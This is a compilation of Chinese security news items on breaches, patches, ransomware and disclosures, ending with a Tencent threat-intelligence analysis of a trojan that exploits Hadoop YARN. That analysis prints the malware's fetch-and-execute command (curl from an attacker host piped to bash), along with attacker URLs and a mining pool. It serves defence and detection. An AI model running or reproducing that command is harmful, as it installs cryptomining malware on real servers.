英国隐私监管机构表示，已就喜达屋酒店及度假酒店国际集团(Starwood Hotels & Resorts Worldwide Inc., 简称﹕喜达屋)遭受网络攻击对万豪国际集团(Marriott International Inc., MAR)处以1840万英镑（2380万美元）的罚款。 英国信息委员办公室（ICO）表示，一项调查发现万豪未能实施适当的技术或组织措施来保护其系统上处理的个人数据，该机构对该公司未能确保客户个人数据的安全而实施处罚。 今年3月31日，万豪国际集团发布公告，称约520万名客人的信息可能被泄露，包括姓名、地址、联系方式、偏好等。 这已经不是万豪首次大规模泄露客人的个人隐私。 早在2018年11月，万豪国际集团官方发布声明称，喜达屋旗下酒店的客房预订数据库被黑客入侵，在2018年9月10日或之前曾在该酒店预定的最多约5亿名客人的信息或被泄露。这些客人中约有3.27亿人的信息包括：姓名、邮寄地址、电话号码、电子邮件地址、护照号码、SPG俱乐部账户信息、出生日期、性别、到达与离开信息、预定日期和通信偏好。对于某些客人而言，泄露的信息还包括支付卡号和支付卡有效期，但支付卡号已通过高级加密标准(AES-128)加密。 上述消息公布后，万豪国际股价大跌5.75%。当时万豪国际集团并表示已向相关执法部门报告此事件，并配合调查。 资料显示，2016年美国连锁酒店运营商万豪国际集团以超120亿美金收购喜达屋酒店及度假村全球公司。       （消息来源：cnBeta；封面来自网络）

按照今年早些时候更新的生命周期，微软正准备退役另一个Windows 10版本, 它是Windows 10 Build 1809，或者说2018年10月更新，一直是微软桌面操作系统最具争议的功能更新之一，许多人实际上将其描述为该公司迄今为止最大的失败。 而这一切都是因为2018年10月更新出厂时存在一个重大的bug，有可能导致某些存储在库中的用户文件被删除，这一切都因为微软在向生产设备推出新版本之前实际上没有解决这个问题。这家软件巨头最终决定暂时撤下该更新，只是在大约一个月后重新发布了该更新，并出现了其他错误。 Windows 10 2018年10月更新本应在今年5月退役，但由于全球健康危机迫使我们许多人开始在家工作，该公司最终决定将其支持结束日期延长六个月。这个想法很简单，因为它可以很简单。IT管理员因此有更多的时间来升级电脑，从而为Windows10版本1809的消亡做准备。 微软表示，该版本的最终安全更新将于2020年11月10日发布，而不是2020年5月12日。3月，我们宣布将暂停所有支持的Windows客户端和Windows服务器版本的可选非安全更新发布（也称为 “C “和 “D “版本），以使组织有时间在全球疫情大流行的情况下专注于业务连续性。 现在时间到了，Windows 10 Build 1809预计将在下周退役，用户再次被警告应尽快升级设备。不过并不是所有的SKU都会受到这一变化的影响，微软还将停用针对消费者的版本。Windows 10版本1809的教育和企业SKU将继续像以前一样提供服务。 那么，对于仍在运行2018年10月更新的Windows 10用户来说，下一步是什么？基本上，继续接收更新的最简单方法就是安装更新版本的Windows 10。最近，微软已经启动了2020年10月更新的推出，这个更新因此更新了两年，它带有微软开发的最新功能，包括主题感知的实时磁贴和其他改进。 不过，10月更新的推出是分阶段进行的，并不是所有的设备现在都能从Windows Update中下载。不过，其他方法，比如媒体创建工具，可以让用户安装10月更新，而无需等待这个版本出现在Windows Update上。         （消息及封面来源：cnBeta）  

最近，我们观察到了Silent Librarian APT黑客组织针对全球范围内大学的网络钓鱼活动。10月19日，通过伪装的COVID-19调查，我们确定了针对哥伦比亚大学（UBC）员工的新型网络钓鱼文档，该文档是一个会自动下载勒索软件并勒索受害者的恶意Word文件。幸运的是，基于UBC网络安全团队的迅速对应措施，该网络钓鱼活动并未成功。 … 更多内容请至Seebug Paper  阅读全文：https://paper.seebug.org/1390/       消息来源：Malwarebytes，封面来自网络，译者：小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

过去几年，谷歌 Project Zero 团队已经披露过影响 Windows 10、macOS、iOS 等平台的严重安全漏洞。通常情况下，受影响的机构将有 90 天的时间来筹备修复，然后相关漏洞详情才会被公开披露。最新消息是，谷歌 Project Zero 团队刚刚披露了影响 GitHub 开源代码托管平台的一个“高度严重”的安全漏洞。 据悉，问题源于 GitHub Actions 中的工作流命令极易受到注入攻击。而所谓的 Actions，主要负责与“动作执行器”（Action Runner）之间的通信工作。 Felix Wilhelm 在审查源代码时发现了这个严重的安全隐患：“当进程解析至 STDOUT 的每一行，以寻找工作流命令时，每个 GitHub 操作都会在执行过程中打印出不受信任的内容”。 自 7 月 21 日发现该安全漏洞之后，Project Zero 团队已经及时向 GitHub 方面通报了此事，并为其提供了标准的 90 天宽限期（截止 10 月 18 日）。 最终 GitHub 决定弃用易受攻击的命令，并发出“中等严重的安全漏洞”的修补建议，通知开发者更新其工作流程。 10 月 16 日，GitHub 得到了 Project Zero 团队提供的额外 14 天宽限期，以完全禁用相关命令（新截止日期为 11 月 2 日）。 不过当 GitHub 试图再申请 48 小时的宽限期后，Project Zero 觉得一再拖延并不能解决问题，并且有违标准的漏洞披露流程，于是最终还是披露了漏洞详情和概念验证代码。     （消息来源：cnBeta；封面来自网络）

微软已经承认了存在于 Windows 10 系统中的两个新错误，并承诺会尽快修复。正如本站近期报道的那样，Windows 10 系统中存在一个令人讨厌的错误，当某些用户启用 Microsoft Store 应用或启用 VPN 连接时候会出现网络连接错误的情况。 Windows 10 May 2020（20H1/Version 2004）功能更新及更高版本都存在这个问题。在某些情况下，Windows 10 的这个 BUG 会破坏互联网连接，并阻止了 Spotify，Office，Microsoft Store 等重要应用程序上线。 一些报告表明该问题可能与VPN或代理使用有关，而其他报告则指出 Windows 10 更新破坏了“网络连接状态指示器（NCSI）”。目前仍不清楚网络断开错误的根源是什么，但是微软表示将解决类似的问题，该问题将阻止重要的应用程序联网。微软计划在本月的补丁星期二活动日中发布补丁进行修复。 此外微软还承认了可能会导致开始菜单中动态磁贴无法正常工作的问题。发生这种情况时，您会注意到磁贴显示为灰色，并带有“正在进行应用更新”进度条。目前尚不清楚微软何时计划解决该特定错误，但该技术巨头已经在9月发布的预览版本中对其进行了修补。 值得注意的是，微软还注意到Windows 10中的其他问题，其中一个问题是睡眠模式无法按预期工作，并且“重置此PC”功能无法刷新系统映像。     （消息来源：cnBeta；封面来自网络）

Maze 是最活跃、最臭名昭著的数据窃取勒索软件组织之一，不过现在它宣布“正式关闭”。这是一个令人费解的公告，公告中不仅多处出现拼写错误，而且是在暗网网站上发布的。在过去一年中，该组织已针对大量目标公司发起了攻击，包括信息技术咨询及业务流程提供商 Cognizant、网络安全保险公司 Chubb、制药巨头 ExecuPharm、特斯拉和SpaceX的零件供应商 Visser 和国防承包商 Kimchuk。 通常情况下，勒索软件会对硬盘数据进行加密，用户只有交付赎金之后才能解锁。而 Maze 的做法更加激进，它们会首先泄漏受害者的部分数据，并威胁他们如果不支付赎金就公开这些数据。它很快成为勒索软件组织的首选策略，勒索软件组织通常在黑暗的网络上建立网站，以在受害者拒绝付款时泄露其窃取的文件。 Maze最初使用漏洞攻击工具包和垃圾邮件活动来感染受害者，但后来开始使用已知的安全漏洞专门针对大型公司。Maze 随后使用易受攻击的虚拟专用网（VPN）和远程桌面（RDP）服务器对受害者的网络发动有针对性的攻击。 部分要求的赎金高达数百万美元。据报道，Maze向一家佐治亚州的电线和电缆制造商索要600万美元，并向一个未具名的组织索要 1500 万美元。但是，在 3 月宣布 COVID-19 大流行之后，Maze 以及其他勒索软件组织承诺不会以医院和医疗设施为目标。 安全公司 EMSIsoft 的勒索软件专家和威胁分析师布雷特·卡洛（Brett Callow）说：“显然，Maze 的这次退休是将信将疑的。这可能是该团体已经赚够了钱，可以关门大吉。不过更大的可能是他们要重新命名。由于迷宫是一个附属机构，他们的犯罪伙伴不太可能退休，而只会与另一个团体结盟。”       （消息来源：cnBeta；封面来自网络）

谷歌的 Project Zero 团队近日披露了存在于 Windows 系统中的零日漏洞，会影响从 Windows 7 至 Windows 10 Version 1903 系统版本。在博文中，谷歌表示已经有证据表明有攻击者利用该漏洞发起了攻击，可提升权限以执行远程代码。 有趣的是，这个标记为 CVE-2020-17087 的漏洞和上周披露的另一个 Chrome 零日漏洞（CVE-2020-15999）配合使用，能够从沙盒中逃逸。外媒 ZDNet 的 Catalin Cimpanu 解释说，恶意行为者可以通过这两个漏洞逃避浏览器的安全环境，在受感染的目标设备上执行任意代码。 披露的博文中，微软将会在今年 11 月的补丁星期二活动日（10日）中修复该漏洞。不过由于 Windows 7 系统的主流支持已经停止，因此仅面向那些订阅了扩展安全更新（ESU）的用户。自从该漏洞被积极利用以来，这家搜索巨头的团队为微软提供了 7 天的时间来修补该漏洞，然后才在今天公开予以披露。 在最新的 Chrome 86.0.4240.1111 版本更新中，谷歌已经修复了漏洞。至于Windows错误，该漏洞位于Windows内核密码驱动程序（cng.sys）中，谷歌 Project Zero 团队对其进行了详细说明。该公司还附加了概念验证代码，以显示该漏洞如何使系统崩溃。 此外，Google 威胁分析小组的负责人谢恩·亨特利（Shane Huntly）已确认该漏洞和即将到来的美国总统大选没有任何关系。       （消息来源：cnBeta；封面来自网络）

据外媒报道，就在美大选前几周，黑客通过操纵发票的手段从威斯康辛州共和党那里窃取了230万美元。据悉，这起盗窃案在10月22日被注意到，威斯康辛州共和党主席Andrew Hitt表示，FBI目前正在调查此案。 据Hitt介绍，黑客使用了来自竞选团队合作的几家供应商的伪造发票，这些发票主要用于竞选邮递和特朗普周边商品等。这些文件没有提供供应商的付款信息，而是将钱转给了黑客。 这种黑客攻击实际上是一种相当常见的骗局：Facebook和谷歌在2017年也曾遭受过类似的网络钓鱼攻击，当时涉案金额高达1亿美元。骗子经常使用假发票来针对企业、组织和其他团体，希望能在合法发票的基础上偷到假发票。考虑到在大选前最后几周进行竞选活动是多么得疯狂，所以很容易想象那些诈骗发票是如何漏掉的。 威斯康辛州被认为是特朗普和拜登在即将到来的选举中必不可少的州。     （消息及封面来源：cnBeta）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/953ZHaf8IjLGyxB3tWSoDQ 一、概述 腾讯安全威胁情报中心检测到永恒之蓝下载器木马新增利用Hadoop Yarn未授权访问漏洞攻击。该变种入侵Linux服务器后下载门罗币挖矿木马，然后将挖矿任务进行持久化、清除竞品挖矿木马，并通过SSH爆破横向移动。 永恒之蓝下载器木马自2018年底出现以来，一直处于活跃状态。该病毒不断变化和更新攻击手法，从最初只针对Windows系统扩大攻击范围到Linux系统。截止目前，其攻击手法已涵盖弱口令爆破、系统漏洞利用、Web漏洞利用等，其中利用SSH、Redis、Hadoop Yarn服务的攻击方式可能对云主机以及云上业务造成较大威胁。其主要入侵方式列表如下： 腾讯安全系列产品针对永恒之蓝下载器木马最新变种的响应清单如下 ： 应用场景 安全产品 解决方案 威胁情报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）永恒之蓝漏洞MS17-010; 2）SMBGhost漏洞CVE-2020-0796; 3）Redis未授权访问漏洞; 4）Hadoop Yarn未授权访问漏洞   有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 已支持检测： 1）永恒之蓝漏洞MS17-010; 2）SMBGhost漏洞CVE-2020-0796; 3）Redis未授权访问漏洞; 4）Hadoop Yarn未授权访问漏洞   腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 网络资产风险监测系统 （腾讯御知） 1）腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2）已集成无损检测POC，企业可以对自身资产进行远程检测。 关于腾讯T-Sec网络资产风险监测系统的更多信息，可参考：https://s.tencent.com/product/narms/index.html 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持检测： 1）永恒之蓝漏洞MS17-010; 2）SMBGhost漏洞CVE-2020-0796; 3）Redis未授权访问漏洞; 4）Hadoop Yarn未授权访问漏洞   关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序； 2）已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3）已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序；   腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 二、详细分析 Hadoop是一个由Apache基金会所开发的分布式系统基础架构，YARN是hadoop系统上的资源统一管理平台，其主要作用是实现集群资源的统一管理和调度，可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上，通过YARN来管理资源。用户可以向YARN提交特定应用程序进行执行，其中就允许执行相关包含系统命令。 YARN提供有默认开放在8088和8090的REST API（默认前者）允许用户直接通过API进行相关的应用创建、任务提交执行等操作，如果配置不当，REST API将会开放在公网导致未授权访问的问题，攻击者可以在未授权的情况下远程执行代码。 永恒之蓝下载器木马变种在yarnexec()函数中对yarn未授权访问漏洞进行利用。 攻击成功后执行远程命令： export src=yarn;curl -fsSL t.amynx.com/ln/core.png?yarn|bash core.png首先下载门罗币挖矿木马d.ackng.com/ln/xr.zip并启动挖矿进程/.Xll/xr，然后添加crontab定时任务将挖矿作业持久化。 清除竞品挖矿木马： 利用SSH爆破进行横向移动： 永恒之蓝下载器木马历次版本更新情况如下：  IOCs URL http[:]//d.ackng.com/ln/xr.zip http[:]//t.amynx.com/ln/core.png http[:]//t.amynx.com/ln/a.asp http[:]//t.jdjdcjq.top/ln/a.asp MD5 if.bin 888dc1ca4b18a3d424498244acf81f7d a.jsp(powershell) c21caa84b327262f2cbcc12bbb510d15 kr.bin e04acec7ab98362d87d1c53d84fc4b03 core.png e49367b9e942cf2b891f60e53083c938 a.jsp(shell) b204ead0dcc9ca1053a1f26628725850 gim.jsp b6f0e01c9e2676333490a750e58d4464 矿池： lplp.ackng.com:444 参考链接： 1. Hadoop Yarn REST API未授权漏洞利用挖矿分析 https://www.freebuf.com/vuls/173638.html 2. 关于Apache Hadoop Yarn资源管理系统REST API未授权漏洞通知 https://bbs.qcloud.com/thread-50090-1-1.html 3. 永恒之蓝下载器最新变种重启EXE文件攻击，新变种已感染1.5万台服务器 https://s.tencent.com/research/report/1038.html 4.https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py （封面来自网络）

网络安全报告书由网络安全基础设施安全局（CISA）、联邦调查局（FBI）和美国网络司令部国家宣教部队（CNMF）联合撰写，主要描述了针对朝鲜高级黑客组织Kimsuky网络攻击所使用的战术、技术和程序（TTP）。 本文描述了截止2020年7月已知的Kimsuky黑客网络攻击事件，旨在保护相关组织免受该黑客影响。 … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1384/     消息来源：us-cert.cisa.gov ，封面来自网络，译者：小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。